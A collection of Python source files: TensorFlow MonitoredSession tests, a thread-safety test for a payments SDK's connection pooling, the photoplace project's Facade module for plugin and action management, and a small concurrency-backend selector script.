self._timeout_in_ms = timeout_in_ms
self._output_partition_graphs = output_partition_graphs
self._debug_tensor_watch = debug_tensor_watch
self.run_options_list = []
self.run_metadata_list = []
def before_run(self, run_context):
options = config_pb2.RunOptions(
trace_level=self._trace_level,
timeout_in_ms=self._timeout_in_ms,
output_partition_graphs=self._output_partition_graphs)
options.debug_tensor_watch_opts.extend([self._debug_tensor_watch])
return tf.train.SessionRunArgs(None, None, options=options)
def after_run(self, run_context, run_values):
self.run_options_list.append(run_values.options)
self.run_metadata_list.append(run_values.run_metadata)
class MonitoredSessionTest(tf.test.TestCase):
"""MonitoredSession tests."""
def test_defaults(self):
with tf.Graph().as_default():
a_var = tf.Variable(0)
with tf.train.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
def test_last_step(self):
logdir = _test_dir(self.get_temp_dir(), 'test_last_step')
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
# Run till step 3 and save.
hooks = [tf.train.StopAtStepHook(last_step=3)]
scaffold = tf.train.Scaffold().finalize()
with tf.train.MonitoredSession(hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(3, session.run(do_step))
self.assertTrue(session.should_stop())
save_path = scaffold.saver.save(session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Run till step 5 and save.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = tf.train.ChiefSessionCreator(
tf.train.Scaffold(init_fn=load_ckpt))
hooks = [tf.train.StopAtStepHook(last_step=5)]
with tf.train.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(3, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(5, session.run(do_step))
self.assertTrue(session.should_stop())
def test_num_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_num_steps')
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
# Do 3 steps and save.
hooks = [tf.train.StopAtStepHook(num_steps=3)]
scaffold = tf.train.Scaffold().finalize()
with tf.train.MonitoredSession(hooks=hooks) as session:
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
save_path = scaffold.saver.save(session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Restore and do 4 steps.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = tf.train.ChiefSessionCreator(
scaffold=tf.train.Scaffold(init_fn=load_ckpt))
hooks = [tf.train.StopAtStepHook(num_steps=4)]
with tf.train.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
# This set of tests, verifies the supervised session behavior when exceptions
# are raised next to the innermost session run() call.
def test_recovery(self):
logdir = _test_dir(self.get_temp_dir(), 'test_recovery')
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
scaffold = tf.train.Scaffold()
# Use a hook to save the model every 100 steps. It also saves it at
# the end.
hooks = [tf.train.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)]
with tf.train.MonitoredSession(
session_creator=tf.train.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with tf.train.MonitoredSession(
session_creator=tf.train.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir)) as session:
self.assertEqual(2, session.run(gstep))
def test_retry_on_aborted_error(self):
# Tests that we silently retry on abort. Note that this does not test
# recovery as we do not use a CheckpointSaver in this test.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, tf.errors.AbortedError(None, None, 'Abort'))
with tf.train.MonitoredSession(hooks=[hook]) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
# MonitoredSession automatically retries and restart from a freshly
# initialized session, so the step is back to 0 and running do_step
# moves it to 1.
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertTrue(hook.raised)
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
def test_recover_and_retry_on_aborted_error(self):
# Tests that we silently retry and recover on abort. This test uses
# a CheckpointSaver to have something to recover from.
logdir = _test_dir(self.get_temp_dir(),
'test_recover_and_retry_on_aborted_error')
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
scaffold = tf.train.Scaffold()
abort_hook = RaiseOnceAtCountN(
4, tf.errors.AbortedError(None, None, 'Abort'))
# Save after each step.
ckpt_hook = tf.train.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)
hooks = [abort_hook, ckpt_hook]
with tf.train.MonitoredSession(
session_creator=tf.train.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
# MonitoredSession automatically restores and retries.
self.assertEqual(3, session.run(do_step))
self.assertTrue(abort_hook.raised)
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
def test_exit_cleanly_on_out_of_range_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, tf.errors.OutOfRangeError(None, None, 'EOI'))
session = tf.train.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises OutOfRange. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_exit_cleanly_on_stop_iteration_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, StopIteration)
session = tf.train.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises StopIteration. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_regular_exception_pass_through_run(self):
# Tests that regular exceptions just pass through a "with
# MonitoredSession" block and set the session in stop mode.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, RuntimeError('regular exception'))
session = tf.train.MonitoredSession(hooks=[hook])
with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
with session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# This triggers the hook and raises the exception
session.run(do_step)
# We should not hit this
self.assertFalse(True)
self.assertTrue(hook.raised)
self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through a "run()" call within a "with MonitoredSession" block and
# set the session in stop mode.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
session = tf.train.MonitoredSession()
run_performed_without_error = False
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
# Call run() which should perform normally.
self.assertEqual(0, session.run(gstep))
run_performed_without_error = True
self.assertTrue(run_performed_without_error)
def test_regular_exception_reported_to_coord_pass_through_return(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through returning from a "with MonitoredSession" block and
# set the session in stop mode.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
session = tf.train.MonitoredSession()
with self.assertRaisesRegexp(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
self.assertTrue(session.should_stop())
# This set of tests, verifies the session behavior when exceptions are raised
# from code inside a "with MonitoredSession:" context.
def test_stop_cleanly_when_no_exception_in_with_body(self):
# Tests that regular exceptions pass through
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
session = tf.train.MonitoredSession()
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_raises_regular_exceptions_in_with_body(self):
# Tests that regular exceptions in "with body" are seen outside.
with tf.Graph().as_default():
gstep = tf.contrib.framework.get_or_create_global_step()
do_step = tf.assign_add(gstep, 1)
session = tf.train.MonitoredSession()
# We should see that exception.
with self.assertRaisesRegexp(RuntimeError, 'regular exception'):
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Will be visible outside the "with body".
raise RuntimeError('regular exception')
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_graph(self):
g = tf.Graph()
with g.as_default():
session = tf.train.MonitoredSession()
self.assertEqual(g, session.graph)
def test_merge_run_options_from_hooks(self):
"""Test for rewriting RunOptions and observing RunMetadata with hooks."""
with tf.Graph().as_default():
my_const = tf.constant(42, name='my_const')
_ = tf.constant(24, name='my_const_2')
watch_a = config_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_a = RunOptionsMetadataHook(2, 30000, False, watch_a)
watch_b = config_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_b = RunOptionsMetadataHook(3, 60000, True, watch_b)
with tf.train.MonitoredSession(hooks=[hook_a, hook_b]) as session:
self.assertEqual(42, session.run(my_const))
# trace_level=3 should have overridden trace_level=2;
# timeout_in_ms=60000 should have overridden 30000;
# output_partition_graphs=True should have overridden False.
# The two debug tensor watches should have been merged.
self.assertEqual(
[
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_tensor_watch_opts=[watch_a, watch_b])
],
hook_b.run_options_list)
self.assertEqual(1, len(hook_b.run_metadata_list))
self.assertTrue(
isinstance(hook_b.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook_b.run_metadata_list[0].partition_graphs), 0)
def test_merge_caller_and_hook_run_options(self):
"""Test that RunOptions from caller and hooks can be merged properly."""
with tf.Graph().as_default():
my_const = tf.constant(42, name='my_const')
_ = tf.constant(24, name='my_const_2')
hook_watch = config_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook = RunOptionsMetadataHook(2, 60000, False, hook_watch)
with tf.train.MonitoredSession(hooks=[hook]) as session:
caller_watch = config_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
caller_options = config_pb2.RunOptions(
trace_level=3, timeout_in_ms=30000, output_partition_graphs=True)
caller_options.debug_tensor_watch_opts.extend([caller_watch])
self.assertEqual(42, session.run(my_const, options=caller_options))
# trace_level=3 from the caller should override 2 from the hook.
# timeout_in_ms=60000 from the hook should override from the caller.
# output_partition_graph=True from the caller should override False
# from the hook.
# The two debug watches from the caller and the hook should be merged,
# in that order.
self.assertEqual(
[
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_tensor_watch_opts=[caller_watch, hook_watch])
],
hook.run_options_list)
self.assertEqual(1, len(hook.run_metadata_list))
self.assertTrue(
isinstance(hook.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook.run_metadata_list[0].partition_graphs), 0)
if __name__ == '__main__':
tf.test.main()
|
test_connection_pooling.py
|
import threading
import timeit
import unittest
import tests.integration.init_utils as init_utils
from onlinepayments.sdk.factory import Factory
from tests.integration.init_utils import MERCHANT_ID
class ConnectionPoolingTest(unittest.TestCase):
"""Performs multiple threaded server requests with connection pooling in order to test thread-safety and concurrency
"""
def setUp(self):
self.flag = threading.Event() # flag to synchronise a start moment for the threads
self.result_list = [] # list to collect results from the threads
self.lock = threading.RLock() # mutex lock for the threads to provide concurrent access to the result list
def test_connection_pool_max_is_count(self):
"""Test with one pool per request"""
self.run_connection_pooling_test(10, 10)
def test_connection_pool_max_is_half(self):
"""Test with one pool per two requests"""
self.run_connection_pooling_test(10, 5)
def test_connection_pool_max_is_one(self):
"""Test with one pool for all 10 requests"""
self.run_connection_pooling_test(10, 1)
def run_connection_pooling_test(self, request_count, max_connections):
"""Sends *request_count* requests with a maximum number of connection pools equal to *max_connections*"""
communicator_configuration = init_utils.create_communicator_configuration(max_connections=max_connections)
with Factory.create_communicator_from_configuration(communicator_configuration) as communicator:
# Create a number of runner threads that will execute send_request
runner_threads = [
threading.Thread(target=self.send_request, args=(i, communicator)) for i in range(0, request_count)
]
for thread in runner_threads:
thread.start()
self.flag.set()
# wait until threads are done before closing the communicator
for i in range(0, request_count - 1):
runner_threads[i].join()
print("Information on concurrent use of connections for {} connection pools:".format(max_connections))
print("(*start time*, *end time*)")
for item in self.result_list:
if isinstance(item, Exception):
self.fail("an exception occurred in one of the threads:/n" + str(item))
else:
print
repr(item)
# check server logs for information about concurrent use of connections
def send_request(self, i, communicator):
"""runs a (concurrent) request"""
try:
client = Factory.create_client_from_communicator(communicator)
self.flag.wait()
start_time = timeit.default_timer()
client.merchant(MERCHANT_ID).services().test_connection()
end_time = timeit.default_timer()
with self.lock:
self.result_list.append((start_time, end_time))
except Exception as e:
with self.lock:
self.result_list.append(e)
# check server logs for additional data about the requests sent
if __name__ == '__main__':
unittest.main()
|
Facade.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Facade.py
#
# Copyright 2010-2015 Jose Riguera Lopez <jriguera@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__program__ = "photoplace"
__author__ = "Jose Riguera Lopez <jriguera@gmail.com>"
__version__ = "0.6.1"
__date__ = "Dec 2014"
__license__ = "Apache 2.0"
__copyright__ ="(c) Jose Riguera"
import os
import threading
import locale
import ConfigParser
import logging
import logging.handlers
import loggingHandler
import time
import datetime
from observerHandler import DObserver
# #######################################
# Main class for Exceptions in Photoplace
# #######################################
class Error(Exception):
"""
Base class for exceptions
"""
def __init__(self, msg, tip='', type='Exception', title='Error'):
self.msg = msg
self.title = title
self.tip = tip
self.type = type
def __repr__(self):
return "%s (%s): %s (%s)" % \
(self.title, str(self.type), self.msg, self.tip)
def __str__(self):
return "* %s (%s):\n * %s\n-> %s" % \
(self.title, str(self.type), self.msg, self.tip)
# #######################################
# Parse string to datetime object
# #######################################
def parse_str_datetime(time_str):
"""Return (<scope>, <datetime.datetime() instance>) for the given
datetime string.
>>> _datetime_from_str("2009")
('year', datetime.datetime(2009, 1, 1, 0, 0))
>>> _datetime_from_str("2009-12")
('month', datetime.datetime(2009, 12, 1, 0, 0))
>>> _datetime_from_str("2009-12-25")
('day', datetime.datetime(2009, 12, 25, 0, 0))
>>> _datetime_from_str("2009-12-25 13")
('hour', datetime.datetime(2009, 12, 25, 13, 0))
>>> _datetime_from_str("2009-12-25 13:05")
('minute', datetime.datetime(2009, 12, 25, 13, 5))
>>> _datetime_from_str("2009-12-25 13:05:14")
('second', datetime.datetime(2009, 12, 25, 13, 5, 14))
>>> _datetime_from_str("2009-12-25 13:05:14.453728")
('microsecond', datetime.datetime(2009, 12, 25, 13, 5, 14, 453728))
"""
formats = [
# <scope>, <pattern>, <format>
("year", "YYYY", "%Y"),
("month", "YYYY-MM", "%Y-%m"),
("day", "YYYY-MM-DD", "%Y-%m-%d"),
("hour", "YYYY-MM-DD HH", "%Y-%m-%d %H"),
("minute", "YYYY-MM-DD HH:MM", "%Y-%m-%d %H:%M"),
("second", "YYYY-MM-DD HH:MM:SS", "%Y-%m-%d %H:%M:%S"),
# ".<microsecond>" at end is manually handled below
("microsecond", "YYYY-MM-DD HH:MM:SS", "%Y-%m-%d %H:%M:%S"),
]
for scope, pattern, format in formats:
if scope == "microsecond":
# Special handling for microsecond part. AFAIK there isn't a
# strftime code for this.
if time_str.count('.') != 1:
continue
time_str, microseconds_str = time_str.split('.')
try:
microsecond = int((microseconds_str + '000000')[:6])
except ValueError:
continue
try:
t = datetime.datetime.strptime(time_str, format)
except ValueError:
pass
else:
if scope == "microsecond":
t = t.replace(microsecond=microsecond)
return scope, t
else:
raise ValueError
import DataTypes
import Plugins
import Actions
import stateHandler
from definitions import *
# ##############################
# Dictionary Template Definition
# ##############################
class TemplateDict(dict):
"""
Class for string templates with dictionaries objects and operator %
This class inherits all attributes, methods, ... from dict and redefines "__getitem__"
in order to return a default value when an element is not found. The format
"key<separator>defaultvalue" indicates that if "key" is not found, then "defaultvalue"
will be returned. It is like an OR: returns value or "defaultvalue".
It is possible to define a global default value for all keys.
"""
_SEPARATORKEYTEMPLATE_ = '|'
_DEFAULTVALUETEMPLATE_ = " "
def __getitem__(self, key):
try:
k, default = key.split(self._SEPARATORKEYTEMPLATE_, 1)
except ValueError:
k = key.split(self._SEPARATORKEYTEMPLATE_, 1)[0]
default = self._DEFAULTVALUETEMPLATE_
return self.get(k, default)
# ################################
# PhotoPlace Facade Interface
# ################################
class Facade(object):
def __init__(self, resources, configfile, args, cfgopt, fargs):
object.__init__(self)
# Overwrite default values with command line args
self.argfiles = []
self.args = args
self.resourcedir = resources
self.configfile = configfile
self.options = dict(PhotoPlace_Cfg_default)
self.logfile = self.options['main'].setdefault('logfile')
self.loglevel = self.options['main'].setdefault('loglevel','')
self.finalize = False
self.state = None
self.observers = {}
self.addons = self.options["addons"]
# add the handler to the root logger
self.logger = logging.getLogger()
self.mainloghandler = loggingHandler.LogRedirectHandler()
self.mainloghandler.setLevel(logging.DEBUG)
consoleformatter = logging.Formatter(PhotoPlace_Cfg_consolelogformat)
self.mainloghandler.setFormatter(consoleformatter)
self.logger.addHandler(self.mainloghandler)
self.logger.setLevel(PhotoPlace_Cfg_loglevel)
self.pluginmanager = Plugins.pluginManager.PluginManager()
self.logger.debug("# " + PhotoPlace_name)
def load_config(self, defaults):
pass
def save_config(self, nosections=PhotoPlace_CONFIG_NOCLONE):
pass
def recover_config(self, directory=PhotoPlace_Cfg_altdir):
pass
def init(self, defaults=False):
if defaults:
self.options = PhotoPlace_Cfg_default
self.state = stateHandler.State(self.resourcedir, self.options['main'],)
def end(self):
self.Clear()
try:
self.unload_plugins()
except Exception as exception:
self.logger.error(str(exception))
def get_geophoto_attr(self, geophoto, options, key, default=None, estimated=None):
value = options[key]
try:
gvalue = geophoto.attr[key]
if isinstance(gvalue, str):
gvalue = gvalue.strip()
if gvalue == PhotoPlace_estimated:
value = estimated
elif gvalue == PhotoPlace_default:
value = default
else:
value = gvalue
else:
value = gvalue
except:
dgettext = dict()
dgettext['attr'] = key
msg_warning = _("Warning processing geophoto string attribute '%(attr)s': type not valid!")
self.logger.debug(msg_warning % dgettext)
return value
def get_geophoto_attr_bool(self, geophoto, options, key, default=None, estimated=None):
value = options[key]
try:
gvalue = geophoto.attr[key]
if isinstance(gvalue, bool):
value = gvalue
elif isinstance(gvalue, str):
gvalue = gvalue.strip()
if len(gvalue) < 1:
pass
elif gvalue == PhotoPlace_estimated:
value = estimated
elif gvalue == PhotoPlace_default:
value = default
else:
value = gvalue.lower() in ["yes", "true", "on", "si", "1"]
else:
raise TypeError
except:
dgettext = dict()
dgettext['attr'] = key
msg_warning = _("Warning processing geophoto bool attribute '%(attr)s': type not valid!")
self.logger.debug(msg_warning % dgettext)
return value
def get_geophoto_attr_number(self, geophoto, options, key, default=None, estimated=None):
value = options[key]
try:
gvalue = geophoto.attr[key]
if isinstance(gvalue, bool):
value = float(gvalue)
elif isinstance(gvalue, float):
value = gvalue
elif isinstance(gvalue, int):
value = float(gvalue)
elif isinstance(gvalue, str):
gvalue = gvalue.strip()
if gvalue == PhotoPlace_estimated:
value = estimated
elif gvalue == PhotoPlace_default:
value = default
else:
value = float(gvalue)
else:
raise TypeError
except:
dgettext = dict()
dgettext['attr'] = key
msg_warning = _("Warning processing geophoto number attribute '%(attr)s': type not valid!")
self.logger.debug(msg_warning % dgettext)
return value
# ####################
# Log Obsevers Section
# ####################
def addlogObserver(self, observer, loglevel=[logging.INFO], *args):
if loglevel:
observer.filters = [ lambda rec, l: rec.levelno in l ]
else:
observer.filters = [ lambda record, thing : True ]
self.mainloghandler.addObserver(observer, loglevel, *args)
def dellogObserver(self, observer):
self.mainloghandler.delObserver(observer)
# ###############################
# Notifiers and observers Section
# ###############################
def _setObservers(self, action):
events = [
action.__class__.action_ini_event(),
action.__class__.action_run_event(),
action.__class__.action_end_event(),
action.__class__.action_start_event(),
action.__class__.action_startgo_event(),
action.__class__.action_finishgo_event(),
action.__class__.action_finish_event(),
]
for event in self.observers.keys():
pattern = re.compile(event)
for action_event in events:
if pattern.match(action_event):
for (observer, args) in self.observers[event]:
if action.hasObserver(observer):
action.addObserver(observer, action_event, *args)
else:
action.addObserver(observer, [action_event], *args)
for event in events:
action.addObserver(
self.pluginmanager.trigger, event, self.pluginmanager, event)
def addNotifier(self, observer, eventlist=['.*'], *args):
if callable(observer):
for event in eventlist:
if not self.observers.has_key(event):
self.observers[event] = []
self.observers[event].append((observer, args))
else:
raise TypeError('Object is not callable!')
def delEvent(self, event):
if event in self.observers.keys():
del self.observers[event]
return True
return False
def delNotifier(self, observer, event=None):
for e in self.observers.keys():
if not event:
event = e
if e == event:
positions = []
postion = 0
for (ob, args) in self.observers[e]:
if ob == observer:
positions.append(position)
position += 1
for position in positions:
self.observers[e].pop(position)
# #########################
# Plugin Management Section
# #########################
def load_plugins(self):
errors = {}
for plugin, path in self.addons.iteritems():
path = os.path.expanduser(path)
path = os.path.expandvars(path)
path = os.path.normpath(path)
if not isinstance(path, unicode):
try:
path = unicode(path, PLATFORMENCODING)
except:
pass
if not os.path.isdir(path):
new_path = os.path.join(self.state.resourcedir_user, path)
if not os.path.isdir(new_path):
path = os.path.join(self.state.resourcedir, path)
else:
path = new_path
try:
self.pluginmanager.load(plugin, path)
except Plugins.pluginManager.PluginManagerError as pluginerror:
msg = str(pluginerror)
self.logger.error(msg)
tip = _("Check if addon syntax is correct ... ")
errors[plugin] = Error(msg, tip, "PluginManagerError")
except ValueError as valueerror:
msg = str(valueerror)
self.logger.error(msg)
return errors
def activate_plugins(self, capability='*', *args):
errors = {}
plugins = self.list_plugins(capability)
for plg in plugins:
try:
self.pluginmanager.activate(plugins[plg], self, self.args, self.argfiles, *args)
except Plugins.pluginManager.PluginManagerError as pluginerror:
msg = str(pluginerror)
self.logger.error(msg)
tip = _("Check addon base class ... ")
errors[plg] = Error(msg, tip, "PluginManagerError")
return errors
def activate_plugin(self, plugin, *args):
plugins = self.list_plugins(plugin=plugin)
if plugin in plugins:
try:
self.pluginmanager.activate(plugins[plugin], self, self.args, self.argfiles, *args)
except Plugins.pluginManager.PluginManagerError as pluginerror:
msg = str(pluginerror)
self.logger.error(msg)
tip = _("Check addon base class ... ")
return Error(msg, tip, "PluginManagerError")
return None
def unload_plugins(self, capability='*', plugin=None):
self.end_plugin(plugin, capability)
plugins = self.list_plugins(capability, plugin)
for plg in plugins:
self.pluginmanager.deactivate(plugins[plg])
def list_plugins(self, capability='*', plugin=None):
plugins = {}
cap = None
if not capability == '*':
cap = capability
for plg in self.pluginmanager.get_plugins(cap):
if plugin != None:
if plg.__module__ == plugin:
plugins[plg.__module__] = plg
else:
plugins[plg.__module__] = plg
return plugins
def init_plugin(self, plugin=None, capability='*', *args):
if self.finalize:
msg = _("Cannot initiate addon while some operations are pending ...")
self.logger.error(msg)
tip = _("Wait a moment ... ")
raise Error(msg, tip, "Error")
plugins = self.list_plugins(capability, plugin)
value = None
for plg in plugins.keys():
try:
value = self.pluginmanager.init(plugins[plg], self.options, *args)
except Plugins.pluginManager.PluginManagerError as pluginerror:
msg = str(pluginerror)
self.logger.error(msg)
tip = _("Check 'Plugin.init' method ... ")
raise Error(msg, tip, "PluginManagerError")
return value
def reset_plugin(self, plugin=None, capability='*', *args):
if self.finalize:
msg = _("Cannot reset addon while some operations are pending ...")
self.logger.error(msg)
tip = _("Wait a moment ... ")
raise Error(msg, tip, "Error")
plugins = self.list_plugins(capability, plugin)
value = None
for plg in plugins.keys():
try:
value = self.pluginmanager.reset(plugins[plg], *args)
except Plugins.pluginManager.PluginManagerError as pluginerror:
msg = str(pluginerror)
self.logger.error(msg)
tip = _("Check 'Plugin.reset' method ... ")
raise Error(msg, tip, "PluginManagerError")
return value
def end_plugin(self, plugin=None, capability='*', *args):
if self.finalize:
msg = _("Cannot finish addon while some operations are pending ...")
self.logger.error(msg)
tip = _("Wait a moment ... ")
raise Error(msg, tip, "Error")
plugins = self.list_plugins(capability, plugin)
value = None
for plg in plugins.keys():
try:
value = self.pluginmanager.end(plugins[plg], self.options, *args)
except Plugins.pluginManager.PluginManagerError as pluginerror:
msg = str(pluginerror)
self.logger.error(msg)
tip = _("Check 'Plugin.end' method ... ")
raise Error(msg, tip, "PluginManagerError")
return value
# ####################
# User Actions Section
# ####################
def Clear(self):
if self.finalize:
msg = _("Cannot clear state while some operations are pending ...")
self.logger.error(msg)
tip = _("Wait a moment ... ")
raise Error(msg, tip, "Error")
else:
if self.state:
self.state.clear()
return None
def DoTemplates(self):
if self.finalize:
return None
dotemplates = Actions.doTemplatesAction.DoTemplates(self.state, self.options)
self._setObservers(dotemplates)
return dotemplates
def LoadPhotos(self, directory=u''):
if self.finalize:
return None
if directory != self.state['photoinputdir']:
self.state['photoinputdir'] = directory
loadphotos = Actions.loadPhotosAction.LoadPhotos(self.state)
self._setObservers(loadphotos)
return loadphotos
return None
def ReadGPX(self, filename=u''):
if filename != self.state['gpxinputfile']:
self.state['gpxinputfile'] = filename
readgpx = Actions.readGPXAction.ReadGPX(self.state)
self._setObservers(readgpx)
return readgpx
return None
def Geolocate(self):
if self.finalize:
return None
geolocate = Actions.geolocateAction.Geolocate(self.state)
self._setObservers(geolocate)
return geolocate
def MakeKML(self):
if self.finalize:
return None
makekml = Actions.makeKMLAction.MakeKML(self.state, self.options['defaults'])
self._setObservers(makekml)
return makekml
def WriteExif(self):
if self.finalize:
return None
writeexif = Actions.writeExifAction.WriteExif(self.state)
self._setObservers(writeexif)
return writeexif
def SaveFiles(self):
if self.finalize:
return None
savefiles = Actions.saveFilesAction.SaveFiles(self.state)
self._setObservers(savefiles)
return savefiles
def WriteCopySave(self):
if self.finalize:
return None
writefiles = threading.Thread(target=self._WriteCopySave)
return writefiles
def _WriteCopySave(self):
if self.finalize:
return False
self.finalize = True
if self.state['exifmode'] != -1:
write = Actions.writeExifAction.WriteExif(self.state)
self._setObservers(write)
write.run()
if self.state.outputdir:
save = Actions.saveFilesAction.SaveFiles(self.state)
self._setObservers(save)
save.run()
self.finalize = False
return True
def goprocess(self, wait=False):
if self.finalize:
msg = _("Some operations are pending ...")
self.logger.error(msg)
tip = _("Wait a moment ... ")
raise Error(msg, tip, "Error")
if self.state.outputdir:
try:
os.makedirs(self.state.outputdir)
except OSError as exception:
# dir exists !?
pass
except Exception as exception:
dgettext = dict()
dgettext['error'] = str(exception)
dgettext['outputkml'] = self.state.outputdir.encode(PLATFORMENCODING)
msg = _("Cannot make dir '%(outputkml)s': %(error)s.") % dgettext
self.logger.error(msg)
tip = _("Check if that directory exists or is writable.")
raise Error(msg, tip, e.__class__.__name__)
if wait:
self.MakeKML().run()
self.WriteCopySave().run()
else:
self.MakeKML().start()
self.WriteCopySave().start()
# EOF
|
run.py
|
#!/usr/bin/env python3
try:
import eventlet
eventlet.monkey_patch()
print('Using eventlet')
create_thread_func = lambda f: f
start_thread_func = lambda f: eventlet.spawn(f)
except ImportError:
try:
import gevent
import gevent.monkey
gevent.monkey.patch_all()
print('Using gevent')
create_thread_func = lambda f: gevent.Greenlet(f)
start_thread_func = lambda t: t.start()
except ImportError:
import threading
print('Using threading')
create_thread_func = lambda f: threading.Thread(target=f)
start_thread_func = lambda t: t.start()
